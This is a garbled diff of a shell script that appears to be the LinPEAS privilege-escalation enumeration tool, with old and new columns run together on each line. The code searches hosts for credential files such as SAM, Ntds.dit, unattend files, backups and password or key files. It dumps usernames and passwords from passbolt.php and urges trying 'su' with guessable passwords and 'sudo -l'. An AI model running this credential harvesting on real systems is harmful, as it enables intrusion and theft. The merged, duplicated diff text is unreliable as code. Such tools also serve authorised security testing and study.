"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) PSTORAGE_SENTRY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70)
PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "environments$" | sort | uniq | head -n 70) PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "environments$" | sort | uniq | head -n 70)
PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cacti$" | sort | uniq | head -n 70) PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cacti$" | sort | uniq | head -n 70)
PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "roundcube$" | sort | uniq | head -n 70) PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "roundcube$" | sort | uniq | head -n 70)
PSTORAGE_PASSBOLT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) PSTORAGE_PASSBOLT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70)
PSTORAGE_WGET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) PSTORAGE_JETTY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70)
PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) PSTORAGE_WGET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.wgetrc$" | sort | uniq | head -n 70)
PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70)
PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70)
PSTORAGE_DATABASE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70)
PSTORAGE_BACKUPS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "backup$|backups$" | sort | uniq | head -n 70) PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70)
PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70)
PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70)
##### POST SERACH VARIABLES ##### ##### POST SERACH VARIABLES #####
@ -1233,11 +1234,22 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil
fi fi
if echo $CHECKS | grep -q SysI; then
if echo $CHECKS | grep -q system_information;
print_title "System Information"
########################################### ###########################################
#-------------) System Info (-------------# #-------------) System Info (-------------#
########################################### ###########################################
print_title "System Information"
#-- SY) OS #-- SY) OS
print_2title "Operative system" print_2title "Operative system"
@ -1420,17 +1432,17 @@ if echo $CHECKS | grep -q SysI; then
else else
if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
fi fi
echo ""
echo ""
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
if echo $CHECKS | grep -q container;
if echo $CHECKS | grep -q Container; then print_title "Container"
############################################## ##############################################
#---------------) Containers (---------------# #---------------) Containers (---------------#
############################################## ##############################################
print_title "Containers"
containerCheck containerCheck
print_2title "Container related tools present" print_2title "Container related tools present"
@ -1524,50 +1536,16 @@ if echo $CHECKS | grep -q Container; then
echo "" echo ""
fi fi
echo "" fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi
if echo $CHECKS | grep -q available_software;
print_title "Available Software"
if echo $CHECKS | grep -q Devs; then
###########################################
#---------------) Devices (---------------#
###########################################
print_title "Devices"
#-- 1D) sd in /dev
print_2title "Any sd*/disk* disk in /dev? (limit 20)"
ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
echo ""
#-- 2D) Unmounted
print_2title "Unmounted file-system?"
print_info "Check if you can mount umounted devices"
if [ -f "/etc/fstab" ]; then
grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
else
echo_not_found "/etc/fstab"
fi
echo ""
print_2title "Mounted disks information"
warn_exec diskutil list
echo ""
print_2title "Mounted SMB Shares"
warn_exec smbutil statshares -a
echo ""
echo ""
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi
if echo $CHECKS | grep -q AvaSof; then
########################################### ###########################################
#---------) Available Software (----------# #---------) Available Software (----------#
########################################### ###########################################
print_title "Available Software"
#-- 1AS) Useful software #-- 1AS) Useful software
print_2title "Useful software" print_2title "Useful software"
@ -1604,24 +1582,17 @@ if echo $CHECKS | grep -q AvaSof; then
echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
fi fi
done done
echo ""
#Useless info
#print_2title "Developer Tools"
#system_profiler SPDeveloperToolsDataType
#echo ""
fi fi
echo''
echo "" echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi
if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets;
if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then print_title "Processes, Crons, Timers, Services and Sockets"
#################################################### ####################################################
#-----) Processes & Cron & Services & Timers (-----# #-----) Processes & Cron & Services & Timers (-----#
#################################################### ####################################################
print_title "Processes, Cron, Services, Timers & Sockets"
#-- PCS) Cleaned proccesses #-- PCS) Cleaned proccesses
print_2title "Cleaned processes" print_2title "Cleaned processes"
@ -1922,19 +1893,16 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then
done done
else echo_not_found "busctl" else echo_not_found "busctl"
fi fi
echo ""
echo ""
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
if echo $CHECKS | grep -q network_information;
if echo $CHECKS | grep -q Net; then print_title "Network Information"
########################################### ###########################################
#---------) Network Information (---------# #---------) Network Information (---------#
########################################### ###########################################
print_title "Network Information"
if [ "$MACOS" ]; then if [ "$MACOS" ]; then
print_2title "Network Capabilities" print_2title "Network Capabilities"
@ -2107,19 +2075,14 @@ if echo $CHECKS | grep -q Net; then
print_2title "USB Info" print_2title "USB Info"
warn_exec system_profiler SPUSBDataType warn_exec system_profiler SPUSBDataType
echo "" echo ""
#Irrelevant to PE
#print_2title "Airport Info"
#warn_exec system_profiler SPAirPortDataType
#echo ""
fi fi
fi
echo "" echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi
if echo $CHECKS | grep -q users_information;
if echo $CHECKS | grep -q UsrI; then print_title "Users Information"
########################################### ###########################################
#----------) Users Information (----------# #----------) Users Information (----------#
########################################### ###########################################
@ -2346,17 +2309,16 @@ if echo $CHECKS | grep -q UsrI; then
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
fi fi
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
echo ""
echo ""
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
if echo $CHECKS | grep -q software_information;
if echo $CHECKS | grep -q SofI; then print_title "Software Information"
########################################### ###########################################
#--------) Software Information (---------# #--------) Software Information (---------#
########################################### ###########################################
print_title "Software Information"
#-- SI) Mysql version #-- SI) Mysql version
print_2title "MySQL version" print_2title "MySQL version"
@ -3125,6 +3087,10 @@ if echo $CHECKS | grep -q SofI; then
if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
print_2title "Analyzing Jetty Files (limit 70)"
